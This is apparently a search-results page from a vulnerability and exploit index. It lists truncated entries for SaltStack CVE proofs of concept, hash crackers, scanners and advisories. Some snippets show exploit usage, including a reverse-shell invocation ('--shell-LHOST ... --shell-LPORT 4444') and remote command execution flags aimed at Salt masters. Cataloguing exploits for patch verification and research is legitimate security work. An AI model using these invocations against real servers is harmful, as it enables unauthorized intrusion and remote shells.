Lucene search
+L

2436 matches found

Kitploit
Kitploit
added 2026/09/21 5:10 p.m.69 views

mose

MOSE Master Of SErvers...

5.3AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/21 4:37 p.m.9 views

CVE-2019-9053-python3-remastered

CVE-2019-9053-python3-remastered The script has been remastered by Teymur Novruzov to ensure compatibility with Python 3. This tool is intended for educational purposes only. Unauthorized use of this tool on any system or network without permission is illegal. The author is not responsible for an...

8.1CVSS7.4AI score0.39693EPSS
SaveExploits38
Kitploit
Kitploit
added 2026/09/21 3:20 p.m.12 views

salt-vulnerabilities

Salt Stack Profile This profile will check to make sure your salt installation is patched to a level that protects you from CVE-2020-11651, and CVE-2020-11652. It does so by checking to ensure the packages salt-api, salt-cloud, salt-master, salt-minion, salt-ssh, salt-syndic, and salt are either...

9.8CVSS8.1AI score0.96614EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/21 2:59 p.m.17 views

DEScrypt-CPU-Collision-Cracker

DEScrypt-CPU-Collision-Cracker What is DEScrypt-CPU-Collision-Cracker? A linux based high performance DEScrypt CPU cracker written in c++, it deduces the salt and uses a password list to crack hashes. Why not use a rainbow table? DEScrypt uses by default a two byte saltcomprised of characters...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/21 12:19 p.m.7 views

CVE-2020-11651

CVE-2020-11651 An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user...

9.8CVSS7.7AI score0.96614EPSS
SaveExploits22References1
Kitploit
Kitploit
added 2026/09/21 11:00 a.m.7 views

CVE-2020-11651

CVE-2020-11651 PoC for CVE-2020-11651 Requires Python3 tested on 3.8 python3.8 -m pip install pyzmq msgpack root@kitploit: ⇒ python3.8 poc.py -h usage: poc.py -h -p PORT -c CMD -k -m -r READ -w WRITE -f FILE server server ... Exploit CVE-2020-11651 positional arguments: server Target Server IP or...

9.8CVSS8.5AI score0.96614EPSS
SaveExploits22
Kitploit
Kitploit
added 2026/09/21 7:49 a.m.8 views

iOSRestrictionBruteForce

iOS Restriction Passcode Brute Force Overview This version of the application is written in Python, which is used to crack the restriction passcode of an iPhone/iPad takes advantage of a flaw in unencrypted backups allowing the hash and salt to be discovered. DEPENDENCIES This has been tested wit...

5.8AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/21 6:53 a.m.7 views

SaltStack-Exp

SaltStack-Exp CVE-2020-11651&&CVE-2020-11652 EXP root@kitploit: Exec-Master: python exp.py --exec-choose master --exec-cmd "whoami" Exec-Minions: python exp.py --exec-choose minions --exec-cmd "whoami" GetShell: python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444 ReadFile: python exp.py --read...

9.8CVSS8AI score0.96614EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/21 3:58 a.m.11 views

CVE-2020-11651-PoC

CVE-2020-11651-PoC Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python and handle the errors with the connections. README COPY FROM THE ORIGINAL REPOSITORY Original Repository PoC exploit for CVE-2020-11651 and CVE-2020-11652 This is a proof of...

9.8CVSS8.2AI score0.96614EPSS
SaveExploits23References2
Kitploit
Kitploit
added 2026/09/20 11:11 p.m.30 views

Dagon

Dagon - Advanced Hash Manipulation Named after the prince of Hell, Dagon day-gone is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to...

5.6AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/20 10:13 p.m.13 views

cve-2020-11651

CVE-2020-11651 This is a POC for CVE-2020-11651, which obtains pre-auth RCE on a salt stack master, and/or all the associated minions. Some light details on the issue are here. POC for 2020-11652 not included. This obtains command execution on the master by creating a runner of salt.cmd with...

9.8CVSS8.2AI score0.96614EPSS
SaveExploits22
Kitploit
Kitploit
added 2026/09/20 10:10 p.m.9 views

CVE-2020-28243

CVE-2020-28243 A command injection vulnerability in SaltStack's Salt allows for privilege escalation via specially crafted process names on a minion when the master calls restartcheck. For a full writeup please see this blog post Affected Versions: All versions between 2016.3.0rc2 and 3002.2 Link...

7.8CVSS7.9AI score0.04302EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/20 9:55 p.m.15 views

salt

Welcome to salt , a tool to reverse and learn kernel heap memory management. It can be useful to develop an exploit, to debug your own kernel code, and, more importantly, to play with the kernel heap allocations and learn its inner workings. This tool helps tracing allocations and the current sta...

5.9AI score
SaveExploits0References6
Kitploit
Kitploit
added 2026/09/20 9:08 p.m.9 views

CVE-2020-11651-poc

PoC exploit for CVE-2020-11651 and CVE-2020-11652 This is a proof of concept exploit based on the initial check script. Use it to verify you have successfully updated your Salt master servers to a release containing the required fixes. Thanks for F-Secure Labs for their research and reporting...

9.8CVSS7.9AI score0.96614EPSS
SaveExploits23References1
Kitploit
Kitploit
added 2026/09/20 4:53 a.m.6 views

salt-shellshock

====================== shellshock bash update This recipe tries to upgrade bash from OS pkg, and falls back to compile bash on systems with no update available. Works for us on old ubuntu/debian. Bash install script from:...

10CVSS8.5AI score0.99999EPSS
SaveExploits146
Nuclei
Nuclei
added 2026/09/20 2:05 a.m.123 views

WordPress Redux Framework <=4.2.11 - Information Disclosure

WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 has...

5.3CVSS5.8AI score0.28961EPSS
SaveExploits6References5
Kitploit
Kitploit
added 2026/09/19 11:15 p.m.10 views

Dagon

Dagon - 高度なハッシュ操作 地獄の王子にちなんで名付けられたDagon デイゴーン は、複数のハッシュタイプのブルートフォース、ブルートフォース辞書の作成、自動ハッシュアルゴリズム検証、UnicodeからASCIIへのランダムソルト生成などが可能な高度なハッシュクラッキング・操作システムです。 スクリーンショット ブルートフォースが簡単に。ワードリストを指定しない場合、内蔵のワードリスト作成機能が100,000の文字列を生成します。...

5.8AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/19 4:39 p.m.17 views

CVE-2020-16846-Saltstack-Salt-API

CVE-2020-16846-Saltstack-Salt-API Vulnerability Explained: An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. The details about this vulnerability can be found here:...

9.8CVSS7.9AI score0.99585EPSS
SaveExploits4References1
EUVD
EUVD
added 2026/09/18 6:00 a.m.8 views

EUVD-2026-82674

The Easy Appointments WordPress plugin before 4.0.2.2 does not use an unguessable token to authorize its mail-link appointment cancellation and confirmation action, deriving the token from a hardcoded source-embedded salt and the appointment's creation timestamp, so unauthenticated attackers who...

4.8CVSS0.0021EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/18 3:53 a.m.15 views

salt-scanner

salt-scanner A linux vulnerability scanner based on Vulners Audit API and Salt Open, with Slack notifications and JIRA integration. Features Slack notification and report upload JIRA integration OpsGenie integration Requirements Salt Open 2016.11.x salt-master, salt-minion¹ Python 2.7 salt you ma...

6AI score
SaveExploits0
Rows per page
Query Builder